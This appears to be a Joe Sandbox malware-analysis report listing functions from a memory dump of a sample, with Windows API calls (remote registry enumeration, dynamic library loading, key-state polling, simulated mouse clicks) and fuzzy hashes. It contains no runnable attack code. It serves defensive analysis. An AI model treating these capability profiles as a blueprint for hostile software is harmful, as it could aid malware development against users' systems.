Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: fd1a262b7e6f1cb596d0076786feeeb097306c284ce0f321d4276a437e8c5e71
Instruction ID: cb0b906c38e52800cc07670e8381356c602d2bec393dc868f94c75b5924b38f2
Opcode Fuzzy Hash: fd1a262b7e6f1cb596d0076786feeeb097306c284ce0f321d4276a437e8c5e71
Instruction Fuzzy Hash: A2519E70A00B05EBDB349FA9C8856AEB7E5EF40320F7487A9F839962D0D7709E549B50

Function 00B902C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17F41: _memmove.LIBCMT ref: 00B17F82

Part of subcall function 00B910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B90038,?,?), ref: 00B910BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B90388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B903C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B9040E
RegCloseKey.ADVAPI32(?,?), ref: 00B9043A
RegCloseKey.ADVAPI32(00000000), ref: 00B90447

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 4ac67751377d1883033f231d58fed7e201bbaed644ecd2f7eb51b5ab6665c43e
Instruction ID: 717224d9cc82ad408918576657f8c5078697a0d551ad68884281fdac786b1f02
Opcode Fuzzy Hash: 4ac67751377d1883033f231d58fed7e201bbaed644ecd2f7eb51b5ab6665c43e
Instruction Fuzzy Hash: CC515B31218205AFDB04EF64C891EAEB7F8FF88714F4489ADB595872A1DB30ED44DB52

Function 00B8DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B19997: __itow.LIBCMT ref: 00B199C2
Part of subcall function 00B19997: __swprintf.LIBCMT ref: 00B19A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B8DC3B
GetProcAddress.KERNEL32(00000000,?), ref: 00B8DCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 00B8DCDA
GetProcAddress.KERNEL32(00000000,?), ref: 00B8DD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B8DD35

Part of subcall function 00B15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B77B20,?,?,00000000), ref: 00B15B8C
Part of subcall function 00B15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B77B20,?,?,00000000,?,?), ref: 00B15BB0

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: ed51840d01c5ff60c571cb1c995d1c03d10ecf3d1457be801b161063672eaa0f
Instruction ID: e4127e06b34fd71d77496e9a72ea6442094e4b4566cd81349f8585af82fcc33f
Opcode Fuzzy Hash: ed51840d01c5ff60c571cb1c995d1c03d10ecf3d1457be801b161063672eaa0f
Instruction Fuzzy Hash: F1512975A00205DFCB10EFA8C4949ADB7F5FF58320B5580AAE819AB361DB30ED85CF91

Function 00B7E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B7E88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B7E8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B7E8F2

Part of subcall function 00B19997: __itow.LIBCMT ref: 00B199C2
Part of subcall function 00B19997: __swprintf.LIBCMT ref: 00B19A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B7E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B7E91F

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 7c19bede3c9dd35817a946e6ecbc675ec5a5c8a26f819b18d1567cbda7810a70
Instruction ID: 6595e36fcbba1b45a5a85f777bd33579b5e612d075435b945b156c05d1c0fc10
Opcode Fuzzy Hash: 7c19bede3c9dd35817a946e6ecbc675ec5a5c8a26f819b18d1567cbda7810a70
Instruction Fuzzy Hash: 26511B35A00205EFCF01EF64C991AAEBBF5EF48314B1480E9E859AB362CB31ED51DB51

Function 00B9A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdcbf93fa122d4f948245676e29a1c29514f852e2c0741ab52ddf1e1b398433a
Instruction ID: efea3bb61acb76de5b473ccf9906f0755810f40976931eccd2c438aec588ef89
Opcode Fuzzy Hash: cdcbf93fa122d4f948245676e29a1c29514f852e2c0741ab52ddf1e1b398433a
Instruction Fuzzy Hash: 4541D335908204AFDB10DF28CC98FA9BBE8EB09320F1541B6F855E72E1DB70AD41DAD5

Function 00B12344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B12357
ScreenToClient.USER32(00BD67B0,?), ref: 00B12374
GetAsyncKeyState.USER32(00000001), ref: 00B12399
GetAsyncKeyState.USER32(00000002), ref: 00B123A7

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 80e5b64dc820d70903b04f49c803fe5e10667ef1dc4ad3eec59b22511129b0f3
Instruction ID: 9aca34aef987370ee532514f70772c19a204e681681eeebae3b6039b315f7591
Opcode Fuzzy Hash: 80e5b64dc820d70903b04f49c803fe5e10667ef1dc4ad3eec59b22511129b0f3
Instruction Fuzzy Hash: 7041B235504119FFCF158F68D844AEDBBB4FB05760F6043AAF83492290C7709EA0EBA5

Function 00B66920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B6695D
TranslateAcceleratorW.USER32(?,?,?), ref: 00B669A9
TranslateMessage.USER32(?), ref: 00B669D2
DispatchMessageW.USER32(?), ref: 00B669DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B669EB

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 36a48b30412113f05c2616b0f1e6f9f73a0957548ed66d1195642265dbf33229
Instruction ID: efac1502dbab8c79c5c8f464b25ce236e75abe12e96f78a12f41c755be172e84
Opcode Fuzzy Hash: 36a48b30412113f05c2616b0f1e6f9f73a0957548ed66d1195642265dbf33229
Instruction Fuzzy Hash: 7E31A371901246AADB24CFB4DC84BB6BBFCEB15314F1441A6E825D31A1EB39D885DBA0

Function 00B68F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B68F12
PostMessageW.USER32(?,00000201,00000001), ref: 00B68FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B68FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00B68FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B68FDA

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 922ce9a312499f964bd5e3c262e54b41924a6dc69f6099dc66af7c71e4f97d9c
Instruction ID: 3e9c9199afdf2e789b3a9bf5da555374f839a80611a14b45482c1167c95e3776
Opcode Fuzzy Hash: 922ce9a312499f964bd5e3c262e54b41924a6dc69f6099dc66af7c71e4f97d9c
Instruction Fuzzy Hash: 3531E071500219EFDF10CF68D94CAAE7BB6FB04325F104669F924EB1E1CBB49950CB90

Function 00B6B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00B6B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B6B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B6B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B6B742
_wcsstr.LIBCMT ref: 00B6B74C

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 53f12382e579149b4d7a89add865dd376cbe8af4e922a17a54926d68da54c9a6
Instruction ID: a6113e8ced34e2c22093f8d5d0bac65045677e5dec20c19efe8102022ef10ee5
Opcode Fuzzy Hash: 53f12382e579149b4d7a89add865dd376cbe8af4e922a17a54926d68da54c9a6
Instruction Fuzzy Hash: 6E21D732204204BAEB255B79DD49E7BBBECDF45720F1040BAF905CA1A1EF65DC80D6A0

Function 00B9B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

GetWindowLongW.USER32(?,000000F0), ref: 00B9B44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B9B471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B9B489
GetSystemMetrics.USER32(00000004), ref: 00B9B4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B81184,00000000), ref: 00B9B4D0

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: ccaa2bb6c64a39766e4e70c86e9a9733bc82499ed3b956c78cfd2bb9166daac3
Instruction ID: f620e92cae485dae2ffb475781bdb0516b5d197858a4af4b470ef7117e1d107a
Opcode Fuzzy Hash: ccaa2bb6c64a39766e4e70c86e9a9733bc82499ed3b956c78cfd2bb9166daac3
Instruction Fuzzy Hash: B9216071614256AFCF109F38AE44E6A77E4EB05730B154779F926D73E2EB309810EB90

Function 00B697E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B69802

Part of subcall function 00B17D2C: _memmove.LIBCMT ref: 00B17D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B69834
__itow.LIBCMT ref: 00B6984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B69874
__itow.LIBCMT ref: 00B69885

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 6d7e7f2835db6679a1104d0b3464303b5b660559f379f107e6bedb0ce3045557
Instruction ID: 643e8211ce4c50cd5b91197245d48dcf7a02fedfce604cd5fdf549bcb68f7017
Opcode Fuzzy Hash: 6d7e7f2835db6679a1104d0b3464303b5b660559f379f107e6bedb0ce3045557
Instruction Fuzzy Hash: CC21B371B00208ABDB109B658C8AEEE7BECEF4A760F0440B9F904DB251DA748D419791

Function 00B112F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B1134D
SelectObject.GDI32(?,00000000), ref: 00B1135C
BeginPath.GDI32(?), ref: 00B11373
SelectObject.GDI32(?,00000000), ref: 00B1139C

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 510f18a36170a27a9bce4694f570cacff546b023460d3d0c7e958f31c2ca061e
Instruction ID: 9a35452785ad9a9efe202de62abbc285ec2d59c167b241689f5b35d8bc80e0a5
Opcode Fuzzy Hash: 510f18a36170a27a9bce4694f570cacff546b023460d3d0c7e958f31c2ca061e
Instruction Fuzzy Hash: E321A170801308EFDB109F69ED047A9BBF8FB10321F544667F920D71A4EB729991EB94

Function 00B6C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00B6C176
_memcmp.LIBCMT ref: 00B6C194
_memcmp.LIBCMT ref: 00B6C1A7
_memcmp.LIBCMT ref: 00B6C1BF
_memcmp.LIBCMT ref: 00B6C1D7

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: a302cd4c29fe0d6d970b873571d9ed363535cd19965a94abbf97aa55e54f92ef
Instruction ID: 5e2bbce02cb6ba549ba5778b71024c969c38be07dafe26abbd754a13bfaa54d9
Opcode Fuzzy Hash: a302cd4c29fe0d6d970b873571d9ed363535cd19965a94abbf97aa55e54f92ef
Instruction Fuzzy Hash: BF01B5B26091067BE204A7285C82FBB7BDCDB633A4F5440A1FD45A6293F764EE1182E4

Function 00B74D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B74D5C
__beginthreadex.LIBCMT ref: 00B74D7A
MessageBoxW.USER32(?,?,?,?), ref: 00B74D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B74DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B74DAC

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 862caabd0ca756abadd002775147fa023114d771124a6944176d6be63fc41ff0
Instruction ID: 2cd023c5b933f15da095af5c5161d74a046d2bf6e4921800958c26ad9201b146
Opcode Fuzzy Hash: 862caabd0ca756abadd002775147fa023114d771124a6944176d6be63fc41ff0
Instruction Fuzzy Hash: 25110872904255BFC7119BBCDC04AAB7FECEB45321F1482AAF928D3291EB758D4087A0

Function 00B6874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B68766
GetLastError.KERNEL32(?,00B6822A,?,?,?), ref: 00B68770
GetProcessHeap.KERNEL32(00000008,?,?,00B6822A,?,?,?), ref: 00B6877F
HeapAlloc.KERNEL32(00000000,?,00B6822A,?,?,?), ref: 00B68786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B6879D

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 603c7790f4f9604e42fe69441e5d7e9a9f7fd9224f8ef4d45de82c3a7f50e2e7
Instruction ID: b91b5bf4ce8cf9e433bec29f9a6e44d80c6cee7fd0e97bb829e77685e10b4d28
Opcode Fuzzy Hash: 603c7790f4f9604e42fe69441e5d7e9a9f7fd9224f8ef4d45de82c3a7f50e2e7
Instruction Fuzzy Hash: 86014B71604205FFDB204FB6DD88D7B7BACEF893A5720056AF949D3260DE318C00CA60

Function 00B754E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B75502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B75510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B75518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B75522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B7555E

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 40a1c8ab383b27304f36eae1be81e8112fc36e081ad819a1feecde9ba84fddca
Instruction ID: 08b0f9b03c34047be58e7556b28f2a6ff966fd00860968645654816ab1f2dc4b
Opcode Fuzzy Hash: 40a1c8ab383b27304f36eae1be81e8112fc36e081ad819a1feecde9ba84fddca
Instruction Fuzzy Hash: 39013931C00A2ADBCF10DBE8E988AEDBBB9FB19711F004196E915F2150DB70965087A1

Function 00B67652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B6758C,80070057,?,?,?,00B6799D), ref: 00B6766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B6758C,80070057,?,?), ref: 00B6768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B6758C,80070057,?,?), ref: 00B67698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B6758C,80070057,?), ref: 00B676A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B6758C,80070057,?,?), ref: 00B676B4

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
